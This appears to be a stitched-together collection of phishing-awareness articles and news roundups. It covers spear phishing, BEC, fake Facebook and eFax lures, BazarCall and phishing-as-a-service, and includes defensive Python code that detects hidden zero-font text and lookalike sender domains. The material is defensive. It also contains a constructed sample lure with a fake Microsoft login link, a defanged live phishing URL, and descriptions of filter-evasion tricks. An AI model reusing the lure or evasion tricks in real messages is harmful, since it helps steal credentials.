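The threshold of two independent tells keeps a single urgent but genuine message from being flagged; a lookalike domain plus a foreign Reply-To is the combination that warrants a phone call to the supposed sender before any transfer is made.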
Spear Phishing Infographic
Organizations need policies and configurations in place to keep phishing mail out of the enterprise network; when users expose themselves on public networks, only their own judgment and good cyber hygiene can keep them safe from spear phishing.
If you have ever received a phishing email, or have an example to share, feel free to comment below with your experience and the message, so we can gather some real-world information on this threat.
Spear phishing attacks are hard to detect and mitigate, so keep your browsers and firewalls active and updated.
Welcome to our February 2023 review of phishing attacks, in which we explore the latest email scams and the tactics that cyber criminals use to trick people into handing over personal data.
This month, we look at a UK government warning about a resurgence in Russian cyber attacks and concerns that the much-discussed AI programme ChatGPT could be used for fraud.
UK government warns of Russian-sponsored phishing campaign
The UK government has issued a warning amid an increase in phishing attacks stemming from Russia and Iran.
In an advisory statement, the NCSC (National Cyber Security Centre) shared details about the campaign, which appears to have been sponsored by the fraudsters' national governments.
The researchers are most concerned about spear phishing, which is a sophisticated form of fraud. Scammers target specific individuals by researching them online â often using Facebook, LinkedIn or the website of the targetâs employer.
Although spear phishing emails often contain the same clues as regular phishing scams, they have a much higher success rate. This suggests that people are more likely to assume that a message is genuine if it contains a few specific details about them, such as their name or their place of work.
The NCSC's advisory highlights ongoing scams conducted throughout last year by the Russia-based group SEABORGIUM and the Iran-based group TA453, also known as APT42.
Their attacks target specific sectors within the UK, including academia, defence, governmental organisations, NGOs and thinktanks, as well as politicians, journalists and activists.
Commenting on the findings, NCSC Director of Operations Paul Chichester said: "The UK is committed to exposing malicious cyber activity alongside our industry partners and this advisory raises awareness of the persistent threat posed by spear-phishing attacks.
"These campaigns by threat actors based in Russia and Iran continue to ruthlessly pursue their targets in an attempt to steal online credentials and compromise potentially sensitive systems.
"We strongly encourage organisations and individuals to remain vigilant to potential approaches and follow the mitigation advice in the advisory to protect themselves online."
Experts concerned that ChatGPT could be used for scams
ChatGPT has taken the Internet by storm, with the AI-backed tool helping writers and hobbyists create content almost instantly.
The program's advanced language model has been championed by people looking to quickly produce quotes, articles and think pieces. However, cyber security experts are warning that another group, scammers, could also embrace the technology.
As Chester Wisniewski, principal research scientist at Sophos, explained, ChatGPT can instantly produce grammatically correct, natural-looking writing, which would resolve one of the biggest challenges scammers face when creating their baits.
"The first thing I do whenever you give me something is figuring out how to break it. As soon as I saw the latest ChatGPT release, I was like, 'OK, how can I use this for bad things?' I'm going to play to see what bad things I can do with it," Wisniewski told TechTarget.
One of those "bad things" that he considered was the ability of ChatGPT to create phishing scams.
"If you start looking at ChatGPT and start asking it to write these kinds of emails, it's significantly better at writing phishing lures than real humans are, or at least the humans who are writing them," he said.
"Most humans who are writing phishing attacks don't have a high level of English skills, and so because of that, they're not as successful at compromising people.
"My concerns are really how the social aspect of ChatGPT could be leveraged by people who are attacking us. The one way we're detecting them right now is we can tell that they're not a professional business.
"ChatGPT makes it very easy for them to impersonate a legitimate business without even having any of the language skills or other things necessary to write a well-crafted attack."
Can you spot a scam?
All organisations are vulnerable to phishing, no matter their size or sector, so it's essential to understand how you might be targeted and what you can do to prevent a breach.
This 45-minute course uses real-world examples like the ones we've discussed here to explain how phishing attacks work, the tactics that cyber criminals use and how you can detect malicious emails.
This recent phishing campaign tricks victims by using Facebook posts in its chain of attacks. The emails that were sent to the targets made it appear as though one of the recipientsâ Facebook posts violated copyright, and they threatened to remove their accounts if no appeal was made within 48 hours.
Phishing email message
"The content of this Facebook post appears legitimate because it uses a dummy 'Page Support' profile with the Facebook logo as its display picture. At first glance, the page looks legitimate, but the link provided in this post leads to an external domain", according to Trustwave.
The Facebook post poses as "Page Support" and uses the Facebook logo to appear as though the company itself manages it.
Facebook post masqueraded as a support page
The main phishing URL, hxxps:/meta[.]forbusinessuser[.]xyz/main[.]php, which resembles Facebookâs copyright appeal page, is reached by clicking the link in the post.
Any data the victim enters into the form is, on submission, forwarded to the attackers together with the victim's client IP address and geolocation data.
The attackers may also collect further details to get past device-fingerprinting checks or security questions when they later log in to the victim's Facebook account.
The victim is then redirected to the next phishing website, where a false 6-digit one-time password (OTP) request with a timer is displayed.
Phishing page with OTP request
Any code entered by the victim will fail, and if the "Need another way to authenticate?" button is pressed, the site redirects to the real Facebook site.
According to Trustwave, multiple Facebook profiles have fake messages that look to be support pages and direct users to phishing websites.
Various Facebook accounts promoting the same fake alerts
These fake Facebook "violation" notifications therefore use real Facebook posts to redirect victims to external phishing sites. Users should treat such violation alerts with caution and not be taken in by the apparent legitimacy of the initial link.
A phishing scam is not only about stealing your login credentials, but it can also install malware, including ransomware, which is why it is essential to learn how to tackle this growing threat.
The number of phishing scams reported in the first quarter of 2022 set a new record of over one million total attacks, according to a report by the Anti-Phishing Working Group.
And the scams have been growing fast in recent years. The number of attempts reported in the first quarter of 2022 is more than triple the average numbers just two years before, in early 2020.
With so many attacks underway, and growing by the day, what's the best way to recognize these scams and prevent them? We'll look at how to recognize and protect yourself from the most common types of phishing fraud. You can also learn how to detect phishing images in an email.
Most prevalent types of phishing scams
Phishing today refers to a type of scam that steals people's personal information by posing as a trusted third party. For example, a scammer might pretend to be a government worker to get you to share your Social Security number or pretend to be from your bank to get you to share account details.
With so many communication channels today, there are more phishing methods than ever before. And scammers have adapted to each type of channel by leveraging trust signals inherent to each one.
This can make it hard for the untrained eye to spot a phishing scam, and even hard to recognize that you've been hacked after falling for an attack. The first sign that tips off most victims is an unexpected charge, a damaged credit score, or a depleted bank account.
Here are the six most common types of phishing scams and how to protect yourself.
1. Email scams
Anyone can fall for an email scam; this U.S. judge did. By far the most common type of phishing attack is via email. Youâre probably familiar with the spam emails we all get on a day-to-day basis, but the most sophisticated phishing attacks look very different.
These emails often look identical to official messages and notifications, including the company's logo and exactly the same content as a real message. For example, one of today's most common scams is a message notification from LinkedIn that's almost impossible to tell apart from the real thing.
How to protect yourself:
Never click on links in emails. Instead, visit the official site.
Beware of email addresses that aren't from the business domain, especially if the address is from a free provider like Gmail.
2. Phone call scams
Another common method fraudsters use to trick victims is over the phone. These calls usually claim to have a one-of-a-kind offer or an urgent, even life-threatening, warning.
Most scammers use a VoIP phone system that lets them change the phone number, meaning the call appears as though itâs from a local number even if itâs not.
How to protect yourself:
Never answer calls from numbers you don't recognize, even if they have a local area code.
Don't return calls from numbers you don't recognize (one type of scam collects expensive per-dial and per-minute fees, hoping you'll call back).
Remember that most U.S. government agencies, including the IRS, Medicare, and the Social Security Administration, almost never call by phone and do not have the power to arrest you.
3. Phishing websites
One of the most common destinations for phishing scams is a fraudulent site that looks like the official website. The cloned site will often be identical to the real page, using the companyâs logos, color scheme, and fonts.
After establishing trust with the design, the site will ask you to share personal information, anything from your email and password to your Social Security number or bank account details. For example, this attack impersonating American Express used an email message and web page almost impossible to tell apart from the real brand.
Phishing email and the phishing page (Screenshots via Armorblox)
How to protect yourself:
If you get a message with a link, even if it looks trustworthy, go to the official site instead.
Check the URL of the website to make sure it's correct. (You'll notice the American Express phishing page above comes from a site other than AmericanExpress.com.)
Don't automatically trust an HTTPS connection. The padlock icon means your connection to that site is encrypted, not that the site is safe: whoever controls a domain, including a phishing domain, can obtain a certificate for it.
4. SMS text message scams (smishing)
Text messages don't have much space for the scammer's message, but that hasn't stopped criminals from trying new tactics to trick innocent victims. The goal of most SMS scams is to get you to click on a link or make a call, so immediately be suspicious of any message with a link or number (though of course, some legitimate messages have these as well).
One of the most common ruses right now with text scams is, ironically enough, helping to protect you from scams. You'll often see a message "confirming" an expensive purchase or withdrawal, directing you to a number or link to cancel or investigate. There is nothing to cancel or investigate, but the scammer will pretend to resolve the situation by collecting your personal data for a future attack.
How to protect yourself:
Don't trust texts from numbers you don't recognize. Instead, visit the official site.
Beware of texts that use vague terms like "your bank" or "package service." Scammers use these (instead of actual company names) so the message can apply to anyone.
Don't reply to scam messages, even to unsubscribe. This only confirms you have an active number and will result in more attacks.
5. Social media phishing
Social media has become one of the more recent additions to the phishing repertoire. Scammers reach out either using a fake lookalike account or a compromised account.
One common ruse is a friend reaching out for help, usually with an authentication code. But it's not a friend; it's a scammer who's taken over their account and is trying to take over yours. Another ruse is a message from someone posing as the official company support account, asking you to provide information to verify you're the authentic owner or to keep your page active.
Fake Support chatbot (Image: Trustwave)
How to protect yourself:
Beware of anyone who reaches out and asks for personal information or verification codes, even if they appear to be coming from a friend.
Don't respond to messages from "official" accounts. If you've received an alert from the social networking site, it'll usually appear in your account settings.
Don't ever share your social media password with a third-party website.
6. Man-in-the-middle attack
This type of attack requires the attacker to be on the same network as you, such as the Wi-Fi at a coffee shop or airport, and it is dangerous because it is hard to notice. The attacker intercepts traffic between you and the sites you visit and can redirect your browser from a legitimate site to a look-alike site without you knowing. Properly configured HTTPS limits what an on-path attacker can read or alter, and tampering with an HTTPS connection produces a certificate warning, so the practical risk is being steered to an attacker-controlled look-alike domain or a plain-HTTP page, which is why checking the address bar still matters here.
Once the attacker has set up a man-in-the-middle attack, they can see almost all the information you share, including usernames, passwords, credit card details, and more.
How to protect yourself:
Avoid public Wi-Fi networks where you can. A better option is to tether to a hotspot on your mobile phone, which gives you a private connection.
If you have to use public Wi-Fi, turn on a VPN. This shields your traffic from the local network and so defeats most man-in-the-middle attacks of this kind.
How to prevent phishing
Every type of phishing requires a slightly different method to spot, and scammers are constantly developing new methods that leverage our weaknesses. But there are a few common warning signs you can look for across different types of phishing attacks.
Unfamiliar senders. Emails, texts, or calls from people you donât recognize are automatically suspect.
Poor spelling or grammar. Major corporations pay careful attention to small details like this. Scammers, on the other hand, don't usually worry about a few typos and often use poor English.
Urgency and threats. Scammers demand immediate action or scare you using intimidation tactics, like arrest or deportation, so you don't recognize the warning signs of a scam.
Unusual payment methods. Phishing scams often take the opportunity to charge a "fee" for a service but will only accept forms of payment like gift cards, money orders, or cryptocurrency. Legitimate businesses use other methods.
What to do if youâre a victim of phishing
You've learned how to protect yourself from phishing scams, but what if you've already fallen victim? If you know you've shared information with a scammer, here's what you should do, based on what information you've shared.
Credit or debit card details. Call the issuing company and have the card canceled immediately. Ask to reverse or dispute any fraudulent charges.
Login details or passwords. Log into the compromised account, change the password, sign out of all active sessions if the service offers that option, and enable two-factor authentication if possible. Do the same for any other accounts that use the same password.
Medical insurance information. Call your insurance company and any impacted companies, explain the fraud, and dispute any fraudulent charges.
Social Security number. Set up a credit freeze at each of the three credit bureaus (Experian, Equifax, and TransUnion). This prevents anyone from requesting credit in your name.
Name, email, date of birth, or other information. Keep a close eye on your accounts for signs of identity theft.
No matter what kind of information you've shared, it's always a good idea to report the fraud to the Federal Trade Commission at IdentityTheft.gov. Filing the report helps protect others, gives you documentation of the attack, and will provide you with recovery steps specific to your situation.
Conclusion
Phishing attacks are on the rise, and scammers are developing even more intricate scams all the time. But if you know the most common warning signs and stay vigilant, you can protect yourself and take quick action in case you've been compromised.
With the release of the PhaaS platform called âCaffeineâ, threat actors can now easily launch their own sophisticated phishing attacks. Anyone who wants to start their own phishing campaign will be able to register on this platform through an open registration process.
Caffeine has been analysed in detail by researchers at Mandiant. Its registration is open: unlike many PhaaS platforms, using its portal to launch phishing campaigns has none of the following requirements:
No invites or referrals required
No approval needed
No social shares required
No specific joining or subscription to any social channel or hacking forum is needed
Trellix recently released a report on the evolution of BazarCall social engineering tactics. BazarCall campaigns first appeared in late 2020, and researchers at Trellix have observed continuous growth in attacks linked to them since.
Reports say that at first it delivered BazarLoader (a backdoor), which was used as an entry point for ransomware; a BazarLoader infection led to the installation of Conti ransomware within about 32 hours.
It was also found delivering other malware, such as Trickbot, Gozi ISFB and IcedID. Throughout, "BazarCall has ceaselessly adapted and evolved its social engineering tactics". The campaigns were most active in the United States and Canada, and also targeted some Asian countries, including India and China.
What is BazarCall?
BazarCall begins with a phishing email but from there deviates to a novel distribution method: using phone call centres to distribute malicious Excel documents that install malware.
In BazarCallâs case, targeted users must dial the number. And when they do, the users are connected with actual humans on the other end of the line, who then provide step-by-step instructions for installing malware into their devices.
About 1 in 5 phishing email messages reach workers’ inboxes, as attackers get better at dodging Microsoft’s platform defenses and defenders run into processing limitations.
This week’s report that cyberattackers are laser-focused on crafting attacks specialized to bypass Microsoft’s default security showcases an alarming evolution in phishing tactics, security experts said this week.
Threat actors are getting better at slipping phishing attacks through the weak spots in platform email defenses, using techniques such as zero-point font obfuscation, hiding behind cloud-messaging services, and delaying payload activation. They are also doing more targeting and research on victims.
As a result, nearly 1 in 5 phishing emails (18.8%) bypassed Microsoft's platform defenses and landed in workers' inboxes in 2022, a rate that increased 74% compared to 2020, according to research published on Oct. 6 by cybersecurity firm Check Point Software. Attackers increasingly used techniques to pass security checks, such as Sender Policy Framework (SPF), and to obfuscate functional components of an email, such as using zero-size fonts or hiding malicious URLs from analysis.
The increasing capabilities of attackers are due to a better understanding of current defenses, says Gil Friedrich, vice president of email security at Avanan, an email security firm acquired by Check Point in August 2021.
“It is a family of 10 to 20 techniques, but they all lead to the objective of deceiving a company’s security layers,” he says. “The end result is always an email that looks genuine to the recipient but looks different to the algorithm that analyzes the content.”
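Friedrich's point, that the same message reads one way to the recipient and another way to the algorithm, can be made concrete. The following is an added example written for this page, not code from Check Point, Avanan or any of the reports quoted here. It parses an HTML email body with Python's standard library, separates the text a mail client would render from text hidden by zero-size fonts or display:none, and collects the links, so that content rules can be run on what the recipient actually sees rather than on the raw markup. The sample message is constructed for the demonstration and the domain in it is invented.

```python
"""Recover what a recipient actually sees in an HTML email body and flag text
that is present in the markup but invisible when rendered (zero-size fonts,
display:none), one of the ways lures dodge keyword-based filters."""
import re
from html.parser import HTMLParser

# Inline styles that make an element's text invisible to the recipient.
ZERO_FONT = re.compile(r"font-size\s*:\s*0(?:\.0+)?\s*(?:px|pt|em|rem|%)?\s*(?:;|$)", re.I)
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
VOID_TAGS = {"br", "img", "hr", "input", "meta", "link", "area", "base", "col", "source"}
BLOCK_TAGS = {"p", "div", "br", "li", "tr", "td", "th", "h1", "h2", "h3", "table"}


class EmailBodyParser(HTMLParser):
    """Splits text nodes into rendered and hidden chunks and collects links.
    Limitation: it trusts the tag nesting; badly mismatched tags can confuse it."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self._open = []           # one entry per open element: True if hidden
        self._hidden_depth = 0    # > 0 while inside at least one hidden element
        self.visible = []         # text chunks the recipient would see
        self.hidden = []          # text chunks only a scanner would see
        self.raw = []             # everything, in source order
        self.urls = []

    def _sink(self):
        return self.hidden if self._hidden_depth else self.visible

    @staticmethod
    def _is_hidden(tag, attrs):
        style = attrs.get("style") or ""
        if ZERO_FONT.search(style) or HIDDEN_STYLE.search(style):
            return True
        return tag == "font" and (attrs.get("size") or "").strip() == "0"

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and attrs.get("href"):
            self.urls.append(attrs["href"])
        if tag in BLOCK_TAGS:                 # block boundaries separate words
            self.raw.append(" ")
            self._sink().append(" ")
        if tag in VOID_TAGS:                  # never closed, so never pushed
            return
        hidden = self._is_hidden(tag, attrs)
        self._open.append(hidden)
        if hidden:
            self._hidden_depth += 1

    def handle_endtag(self, tag):
        if tag in VOID_TAGS or not self._open:
            return
        if self._open.pop():
            self._hidden_depth -= 1

    def handle_data(self, data):
        self.raw.append(data)
        self._sink().append(data)


def _squash(parts):
    return re.sub(r"\s+", " ", "".join(parts)).strip()


def analyze(html):
    """Return rendered text, raw text, hidden fragments and links for an HTML body."""
    parser = EmailBodyParser()
    parser.feed(html)
    parser.close()
    hidden_fragments = [h for h in parser.hidden if h.strip()]
    return {
        "rendered_text": _squash(parser.visible),   # run content rules on this
        "raw_text": _squash(parser.raw),            # what a naive text scan sees
        "hidden_text": _squash(hidden_fragments),
        "hidden_fragments": len(hidden_fragments),
        "urls": parser.urls,
        "suspicious": bool(hidden_fragments),
    }


# Constructed sample lure (not from any real campaign): zero-size spans break up
# the brand name for scanners, and a display:none block adds benign filler text.
SAMPLE_EMAIL = """<html><body>
<p>Dear Customer, your Microsoft 365 password expires today.</p>
<p>Please <a href="https://login.microsoft.com.evil.xyz/">keep your password</a> now.</p>
<p>Micro<span style="font-size:0px">zzz</span>soft Se<span style="font-size: 0">qqq</span>curity</p>
<div style="display:none">This newsletter is about gardening and flowers.</div>
</body></html>"""

if __name__ == "__main__":
    for key, value in analyze(SAMPLE_EMAIL).items():
        print(f"{key}: {value}")
```

On the sample, the raw text contains "Microzzzsoft Seqqqcurity" while the rendered text reads "Microsoft Security"; a keyword rule that runs on the raw markup misses the brand, and one that runs on the rendered text catches it. The presence of any hidden fragment is itself a useful signal, since legitimate mail rarely carries text its reader is never meant to see.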
Meanwhile, cybercriminal services such as phishing-as-a-service and malware-as-a-service are packaging the most successful techniques into easy-to-use offerings. In a survey of penetration testers and red teams, nearly half (49%) considered phishing and social engineering to be the attack techniques with the best return on investment.
In a widespread campaign, threat actors use a compromised Dynamics 365 Customer Voice business account and a link posing as a survey to steal Microsoft 365 credentials.
An elaborate and rather unusual phishing campaign is spoofing eFax notifications and using a compromised Dynamics 365 Customer Voice business account to lure victims into giving up their credentials via microsoft.com pages.
Threat actors have hit dozens of companies through the broadly disseminated campaign, which is targeting Microsoft 365 users from a diverse range of sectors, including energy, financial services, commercial real estate, food, manufacturing, and even furniture-making, researchers from the Cofense Phishing Defense Center (PDC) revealed in a blog post published Wednesday.
The campaign uses a combination of common and unusual tactics to lure users into clicking on a page that appears to lead them to a customer feedback survey for an eFax service, but instead steals their credentials.
Attackers impersonate not only eFax but also Microsoft by using content hosted on multiple microsoft.com pages in several stages of the multistage effort. The scam is one of a number of phishing campaigns that Cofense has observed since spring that use a similar tactic, says Joseph Gallop, intelligence analysis manager at Cofense.
"In April of this year, we began to see a significant volume of phishing emails using embedded ncv.microsoft.com survey links of the sort used in this campaign," he tells Dark Reading.
Combination of Tactics
The phishing emails use a conventional lure, claiming the recipient has received a 10-page corporate eFax that demands his or her attention. But things diverge from the beaten path after that, Cofense PDC’s Nathaniel Sagibanda explained in the Wednesday post.
The recipient most likely will open the message expecting it’s related to a document that needs a signature. “However, that isn’t what we see as you read the message body,” he wrote.
Instead, the email shows what looks like an attached, unnamed PDF delivered by fax; it is not a file at all but an embedded link styled as an attachment, an unusual feature for a phishing email, according to Gallop.
“While a lot of credential phishing campaigns use links to hosted files, and some use attachments, it’s less common to see an embedded link posing as an attachment,” he wrote.
The plot thickens even further down in the message, which contains a footer indicating that it was a survey site, such as those used to collect customer feedback, that generated the message, according to the post.
Mimicking a Customer Survey
When users click the link, they are directed to a convincing imitation of an eFax solution page rendered by a Microsoft Dynamics 365 page that’s been compromised by attackers, researchers said.
This page includes a link to another page, which appears to lead to a Microsoft Customer Voice survey to provide feedback on the eFax service, but instead takes victims to a Microsoft login page that exfiltrates their credentials.
To further enhance legitimacy on this page, the threat actor went so far as to embed a video of eFax solutions for spoofed service details, instructing the user to contact “@eFaxdynamic365” with any inquiries, researchers said.
The “Submit” button at the bottom of the page also serves as additional confirmation that the threat actor used a real Microsoft Customer Voice feedback form template in the scam, they added.
The attackers then modified the template with “spurious eFax information to entice the recipient into clicking the link,” which leads to a faux Microsoft login page that sends their credentials to an external URL hosted by attackers, Sagibanda wrote.
Fooling a Trained Eye
While the original campaigns were much simpler, including only minimal information hosted on the Microsoft survey, the eFax spoofing campaign goes further to bolster the campaign's legitimacy, Gallop says.
Its combination of multistage tactics and dual impersonation may allow messages to slip through secure email gateways as well as fool even the savviest of corporate users who've been trained to spot phishing scams, he notes.
“Only the users that continue to check the URL bar at each stage throughout the entire process would be certain to identify this as a phishing attempt,” Gallop says.
In fact, attackers took on the persona of Microsoft most often in campaigns observed in the first half of 2022, researchers found, though Facebook remains the most impersonated brand in phishing campaigns observed so far this year.
According to the report by researchers at Vade, phishing attacks abusing the Microsoft brand increased 266 percent in the first quarter of 2022 compared with the same quarter a year earlier. Fake Facebook messages were up 177 percent in the second quarter of 2022 on the same year-on-year basis.
The study by Vade analyzed unique instances of phishing URLs used by criminals carrying out phishing attacks and not the number of phishing emails associated with the URLs. The report tallied the 25 most commonly targeted companies, along with the most abused industries and days of the week for phishing emails.
Phishing By the Numbers
Other top abused brands in phishing attacks include Credit Agricole, WhatsApp, and French telecommunications company Orange. Popular brands also included PayPal, Google and Apple (see chart).
Through the first half of 2022, 34 percent of all unique phishing attacks tracked by the researchers impersonated financial services brands. The next most abused industry was cloud services, led by Microsoft, Google and Adobe. Social media was also a popular target, with Facebook, WhatsApp and Instagram leading the list of brands leveraged in attacks.
The report found that the most popular days for sending phishing emails are Monday to Wednesday. Less than 20 percent of malicious emails are sent at the weekend.
"Phishing attacks are more sophisticated than ever," wrote Adrien Gendre, chief tech and product officer at Vade, in an email to Threatpost.
"Hackers have an arsenal of tools at their disposal to manipulate end users and evade email security, including phishing kits that can identify when they are being scanned by a vendor and trigger benign webpages to avoid detection. End users need to be continually trained to identify the latest phishing techniques," he wrote.
Welcome to our July 2022 review of phishing attacks, in which we explore the latest email scams and the tactics that cyber criminals use to trick people into handing over their personal data.
This month, we look at a cyber attack at OpenSea, a US school district that was tricked into transferring funds to a crook and a report on the rising threat of phishing.
NFT marketplace warns users of phishing scams
Last month, the world's largest NFT (non-fungible token) marketplace, OpenSea, disclosed a data breach in which users' email addresses were compromised.
The organisationâs head of security, Cory Hardman, said that the breach occurred when an employee at a third-party email delivery vendor downloaded the details of OpenSea users and newsletter subscribers.
OpenSea has since warned that the information could be used to launch phishing attacks.
"If you have shared your email with OpenSea in the past, you should assume you were impacted. We are working with Customer.io in their ongoing investigation, and we have reported this incident to law enforcement," Hardman said.
"Because the data compromise included email addresses, there may be a heightened likelihood for email phishing attempts."
OpenSea warned users via an email notification
Hardman provided tips to help OpenSea users spot phishing attacks. He urged people to keep an eye out for emails that use domains replicating the genuine OpenSea.io address.
Cyber criminals could do this by using a different top-level domain (such as opensea.org), or by deliberately misspelling the domain name (such as opensae.io).
Hardman also advised users not to download or open email attachments if they believe the message is suspicious, and to never sign wallet transactions if prompted directly via email.
In addition to the theft, the cyber criminals shared a phishing link on Beeple's Twitter account that, if clicked, drained the wallets of the users who followed it.
Incidents such as this and the OpenSea hack demonstrate the challenges that NFT trading presents. Although many people are enticed into NFTs because the market is unregulated, that also creates major security risks.
Whereas banks and other regulated trading platforms are required to take steps to protect people's assets, and will typically have proof of unauthorised access, the crypto culture emphasises personal responsibility.
If a cyber criminal compromises a crypto wallet, victims have little recourse and will have to accept their loss.
School district accidentally wires $200,000 to fraudulent bank
The Floyd County School District in Georgia admitted in June that it had wired $197,672.76 (about £164,000) to a bank account controlled by cyber criminals.
Officials said they received the request from an email address seemingly associated with Ben Hill Roofing, an organisation that had previously worked with a school in the district.
Floyd County Schools made the payment on 29 April, and was only alerted to its mistake after the real Ben Hill Roofing submitted an invoice.
Speaking to a local news outlet, the school district said: "Floyd County Schools has been made aware of a spear phishing incident, which is a targeted email attack pretending to be from a trusted sender. This cyber-attack resulted in funds being stolen from the school system by an outside source."
It added: "We are working with local law enforcement, GEMA, GBI, and insurance officials to recover the funds.
"Because of the cyber security measures FCS has put in place over the past few years, school system officials believe this is an isolated incident. Due to the ongoing investigation, more details cannot be released at this time."
Floyd County Schools has since recovered almost all of the stolen funds following a police investigation. Officers traced the stolen money to a bank in Texas, which had already flagged the account as suspicious.
It's the highest number of phishing attacks ever reported in a quarter, and it follows a steady increase in attacks throughout the past year. In April 2021, the APWG observed just over 200,000 phishing attacks; by March 2022 that had almost doubled, to 384,291.
According to the report, the industry most likely to be targeted was the financial sector. It found that 23.6% of all incidents affected organisations that provide such services.
The next most frequent targets were software-as-a-service and webmail providers (20.5%) and e-commerce sites and retail stores (14.6%).
The report also found that 12.5% of phishing attacks target social media sites, while cryptocurrency platforms account for 6.6% of incidents.
According to John Wilson, Senior Fellow of Threat Research at HelpSystems, the majority of phishing attacks are conducted using BEC (business e-mail compromise).
Wilson noted that in the first quarter of 2022, 82% of BEC messages were sent from free webmail accounts. Gmail is the most popular provider, accounting for 60% of BEC scams.
Meanwhile, 18% of BEC messages used email domains owned by the attacker.
The report also found that the average sum scammers requested in wire transfer BEC attacks in Q1 2022 was $84,512 (about €98,000). This is a significant increase over the previous quarter, in which scammers requested $50,027 (about €58,000) on average.
Phishing is among the biggest cyber threats facing organisations. According to Proofpoint's 2021 State of the Phish Report, more than 80% of organisations fell victim to a phishing attack last year.
One of the most frustrating things about this is that most people know what phishing is and how it works, but many still get caught out.
The growing sophistication of phishing scams has contributed to that. They might still have the same objective, to steal our personal data or infect our devices, but there are now countless ways to do that.
In this blog, we look at five of the most common types of phishing email to help you spot the signs of a scam.
1. Email phishing
Most phishing attacks are sent by email. The crook will register a fake domain that mimics a genuine organisation and sends thousands of generic requests.
The fake domain often involves character substitution, like putting 'r' and 'n' next to each other to create 'rn' instead of 'm'.
In other cases, the fraudsters create a unique domain that includes the legitimate organisation's name in the URL. The example below is sent from 'olivia@amazonsupport.com'.
The recipient might see the word 'Amazon' in the sender's address and assume that it was a genuine email.
There are many ways to spot a phishing email, but as a general rule, you should always check the email address of a message that asks you to click a link or download an attachment.
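The sender-address check described above can be automated. This added example (not code from the blog) flags the two tricks it names, 'rn'-for-'m' style character substitution and a brand name embedded in an unaffiliated domain such as amazonsupport.com; the list of trusted brand domains is a constructed assumption.

```python
# Domains the organisation actually trusts for each brand (constructed list).
KNOWN_BRAND_DOMAINS = {
    "amazon": {"amazon.com", "amazon.co.uk"},
    "paypal": {"paypal.com"},
}

# Glyph pairs fraudsters swap in lookalike domains; "rn" for "m" is the one the
# text describes, the others are common companions.
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def normalise(label: str) -> str:
    """Collapse glyph substitutions so 'Arnaz0n' compares equal to 'amazon'."""
    label = label.lower()
    for fake, real in CONFUSABLES:
        label = label.replace(fake, real)
    return label


def registrable_domain(address: str) -> str:
    """Return the registrable domain of a From address (naive two-label rule,
    three labels for second-level ccTLD suffixes such as co.uk)."""
    domain = address.rsplit("@", 1)[-1].lower().strip("> ")
    parts = domain.split(".")
    if len(parts) >= 3 and parts[-2] in {"co", "com", "org", "gov", "ac"} and len(parts[-1]) == 2:
        return ".".join(parts[-3:])
    return ".".join(parts[-2:])


def classify_sender(address: str) -> str:
    """'legitimate' for a trusted domain (or its subdomains), 'lookalike:<brand>'
    when a brand name survives normalisation inside any other domain, else 'unknown'."""
    domain = address.rsplit("@", 1)[-1].lower().strip("> ")
    if any(registrable_domain(address) in reals for reals in KNOWN_BRAND_DOMAINS.values()):
        return "legitimate"
    for brand in KNOWN_BRAND_DOMAINS:
        # Heuristic: also catches unrelated names containing the brand, which is
        # the price of catching amazonsupport.com and amazon.com.evil.test.
        if brand in normalise(domain):
            return f"lookalike:{brand}"
    return "unknown"
```

A hit on 'lookalike' is a prompt to verify the sender through a known channel, not proof of fraud; a result of 'unknown' simply means no brand was mimicked.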
2. Spear phishing
There are two other, more sophisticated, types of phishing involving email.
The first, spear phishing, describes malicious emails sent to a specific person. Criminals who do this will already have some or all of the following information about the victim:
Their name;
Place of employment;
Job title;
Email address; and
Specific information about their job role.
You can see in the example below how much more convincing spear phishing emails are compared to standard scams.
The fraudster has the wherewithal to address the individual by name and (presumably) knows that their job role involves making bank transfers on behalf of the company.
The informality of the email also suggests that the sender is a native English speaker, and creates the sense that this is a real message rather than a template.
3. Whaling
Whaling attacks are even more targeted, taking aim at senior executives. Although the end goal of whaling is the same as any other kind of phishing attack, the technique tends to be a lot subtler.
Tricks such as fake links and malicious URLs arenât helpful in this instance, as criminals are attempting to imitate senior staff.
Whaling emails also commonly use the pretext of a busy CEO who wants an employee to do them a favour.
Emails such as the above might not be as sophisticated as spear phishing emails, but they play on employees' willingness to follow instructions from their boss. Recipients might suspect that something is amiss but are too afraid to confront the sender and suggest that they are being unprofessional.
4. Smishing and vishing
With both smishing and vishing, telephones replace emails as the method of communication.
Smishing involves criminals sending text messages (the content of which is much the same as with email phishing), and vishing involves a telephone conversation.
One of the most common smishing pretexts is a message supposedly from your bank alerting you to suspicious activity.
In this example, the message suggests that you have been the victim of fraud and tells you to follow a link to prevent further damage. However, the link directs the recipient to a website controlled by the fraudster and designed to capture your banking details.
5. Angler phishing
A relatively new attack vector, social media offers several ways for criminals to trick people. Fake URLs; cloned websites, posts, and tweets; and instant messaging (which is essentially the same as smishing) can all be used to persuade people to divulge sensitive information or download malware.
Alternatively, criminals can use the data that people willingly post on social media to create highly targeted attacks.
As this example demonstrates, angler phishing is often made possible by the number of people contacting organisations directly on social media with complaints.
Organisations often use these as an opportunity to mitigate the damage, usually by giving the individual a refund.
However, scammers are adept at hijacking responses and asking the customer to provide their personal details. They are seemingly doing this to facilitate some form of compensation, but it is instead done to compromise their accounts.
Your employees are your last line of defence
Organisations can mitigate the risk of phishing with technological means, such as spam filters, but these have consistently proven to be unreliable.
Malicious emails will still get through regularly, and when that happens, the only thing preventing your organisation from a breach is your employees' ability to detect their fraudulent nature and respond appropriately.
Our Phishing Staff Awareness Course helps employees do just that, as well as explaining what happens when people fall victim and how they can mitigate the threat of an attack.
New research from the email security firm Inky has revealed that more than 1,000 phishing emails were sent from NHS inboxes over a six-month period.
The firm has claimed that the campaign, beginning October 2021, escalated 'dramatically' in March of this year.
After the findings were reported to the NHS on April 13, Inky reported that the volume of attacks fell significantly to just a 'few'.
'The majority were fake new document notifications with malicious links to credential harvesting sites that targeted Microsoft credentials. All emails also had the NHS email footer at the bottom,' Inky explained.
We're sure you've heard of the KISS principle: Keep It Simple and Straightforward.
In cybersecurity, KISS cuts two ways.
KISS improves security when your IT team avoids jargon and makes complex-but-important tasks easier to understand, but it reduces security when crooks steer clear of mistakes that would otherwise give their game away.
